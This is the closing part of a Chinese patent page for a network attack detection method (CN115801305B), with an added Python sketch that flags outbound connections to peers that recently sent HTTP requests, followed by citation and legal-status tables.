4. An electronic device, comprising: a memory and a processor, characterized in that the processor is adapted to implement the steps of the network attack detection and identification method according to any of claims 1 or 2 when executing a computer program stored in the memory.
5. A computer-readable storage medium having stored thereon a computer program, characterized by: the computer program, when executed by a processor, implements a method for detecting and identifying a network attack according to any of claims 1 or 2.
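The detection flow of claim 1 above (acquiring the target IP address and port from a TCP connection message, backtracking against the http access log, the local preset white list, and the capacity and life-cycle adjustments), as an added Python example that is not part of the patent. The log line and connection message formats, the capacity formula, the sample data and all names are assumptions:

```python
from collections import deque
import re

# Constructed formats (assumptions, not the patent's): an http access log line is
# "<client_ip>:<client_port> <epoch_seconds> <method> <path>"; a TCP connection
# message of the monitored server is "<src_ip>:<src_port> -> <target_ip>:<target_port>".
LOG_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) (\d+) \S+ \S+$")
CONN_RE = re.compile(r"^\S+ -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)$")

def parse_tcp_conn(message):
    """Acquire the target IP address and target port from a TCP connection message."""
    m = CONN_RE.match(message)
    return (m.group(1), int(m.group(2))) if m else None

class HttpAccessLog:
    def __init__(self, capacity=4, base_ttl=300):
        self.entries = deque(maxlen=capacity)  # (ip, port, ts, ttl), oldest first
        self.base_ttl = base_ttl
        self.hits = {}  # (ip, port) -> access frequency seen so far

    def adjust_capacity(self, region_attack_freq, traffic_ratio, base=4, threshold=2.0):
        # Heavier attacks on other servers in the region -> larger log; a traffic change
        # beyond the preset threshold doubles it. Re-bounding keeps the newest entries.
        capacity = base * (1 + region_attack_freq // 10)
        self.entries = deque(self.entries, maxlen=capacity * 2 if traffic_ratio > threshold else capacity)

    def add(self, line):
        m = LOG_RE.match(line)
        if not m:
            return
        key = (m.group(1), int(m.group(2)))
        self.hits[key] = self.hits.get(key, 0) + 1
        # Life cycle of the entry grows with the access frequency of the same ip/port
        self.entries.append((*key, int(m.group(3)), self.base_ttl * self.hits[key]))

    def has_peer(self, ip, port, now):
        # Backtracking step: is there a still-live entry for this ip/port pair?
        return any(e[0] == ip and e[1] == port and now - e[2] <= e[3] for e in self.entries)

def check_tcp_conn(log, whitelist, message, now):
    """Classify one outbound TCP connection message of the monitored server."""
    target = parse_tcp_conn(message)
    if target is None:
        return "unparsed"
    if target in whitelist:  # local preset white list of (ip, port) pairs
        return "no-risk"
    if log.has_peer(target[0], target[1], now):
        return "intrusion-warning"  # the peer sent HTTP requests to this server earlier
    return "unknown"

SAMPLE_LOG = [  # constructed sample access-log lines
    "203.0.113.7:51234 1000 GET /login",
    "203.0.113.7:51234 1010 POST /upload",
    "198.51.100.9:44000 1020 GET /",
]

def demo(now=1100):
    log = HttpAccessLog(capacity=4)
    for line in SAMPLE_LOG:
        log.add(line)
    return tuple(check_tcp_conn(log, {("192.0.2.10", 443)}, msg, now) for msg in (
        "10.0.0.5:38000 -> 203.0.113.7:51234",
        "10.0.0.5:38001 -> 192.0.2.10:443",
        "10.0.0.5:38002 -> 198.51.100.9:9999"))
```

`demo()` returns `("intrusion-warning", "no-risk", "unknown")`: the first connection goes back to an ip/port pair that recently sent HTTP requests, the second is white-listed, and the third has no matching log entry.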
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202211093082.XA CN115801305B (en) | 2022-09-08 | 2022-09-08 | Network attack detection and identification method and related equipment |
Publications (2)
Publication Number | Publication Date |
---|---|
CN115801305A CN115801305A (en) | 2023-03-14 |
CN115801305B true CN115801305B (en) | 2023-11-07 |
Family ID: 85431798
Country Status (1)
Country | Link |
---|---|
CN (1) | CN115801305B (en) |
Families Citing this family (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN116112295B (en) * | 2023-04-12 | 2023-07-04 | 北京长亭未来科技有限公司 | Method and device for researching and judging external connection type attack result |
Citations (14)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103038652A (en) * | 2010-05-25 | 2013-04-10 | 海德沃特合作I有限公司 | Device-assisted services for protecting network capacity |
WO2017018377A1 (en) * | 2015-07-30 | 2017-02-02 | 日本電信電話株式会社 | Analysis method, analysis device, and analysis program |
CN106572083A (en) * | 2016-10-18 | 2017-04-19 | 汉柏科技有限公司 | Log processing method and system |
CN107102795A (en) * | 2017-05-31 | 2017-08-29 | 努比亚技术有限公司 | A kind of log recording method, mobile terminal and computer-readable recording medium |
CN107231365A (en) * | 2017-06-13 | 2017-10-03 | 深信服科技股份有限公司 | The method and server and fire wall of a kind of evidence obtaining |
CN110098957A (en) * | 2019-04-04 | 2019-08-06 | 北京市天元网络技术股份有限公司 | Big data analysis system based on network log |
CN110493165A (en) * | 2018-06-29 | 2019-11-22 | 厦门白山耘科技有限公司 | Automatically determine the method, apparatus and Network Intrusion Detection System of hostile network process |
CN110764969A (en) * | 2019-10-25 | 2020-02-07 | 新华三信息安全技术有限公司 | Network attack tracing method and device |
CN111031009A (en) * | 2019-11-25 | 2020-04-17 | 杭州安恒信息技术股份有限公司 | Multilayer-based NOSQL injection attack detection method and device |
CN113037689A (en) * | 2019-12-24 | 2021-06-25 | 中国移动通信集团河北有限公司 | Log-based virus discovery method and device, computing equipment and storage medium |
CN113722284A (en) * | 2021-07-30 | 2021-11-30 | 济南浪潮数据技术有限公司 | Cluster log storage method, device, equipment and medium |
CN113761527A (en) * | 2020-07-01 | 2021-12-07 | 北京沃东天骏信息技术有限公司 | Rebound shell process detection method, device, equipment and storage medium |
CN113992341A (en) * | 2021-09-09 | 2022-01-28 | 新华三信息安全技术有限公司 | Message processing method and device |
CN114153714A (en) * | 2021-12-01 | 2022-03-08 | 招商局金融科技有限公司 | Log information based capacity adjustment method, device, equipment and storage medium |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US10243854B2 (en) * | 2015-12-09 | 2019-03-26 | International Business Machines Corporation | Persistent connection rebalancing |
Non-Patent Citations (1)
Title |
---|
Design and Implementation of a Log Analysis System for a Medium-Sized Enterprise Data Center; Wang Xiao; China Master's Theses Full-text Database, Information Science and Technology; full text * |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||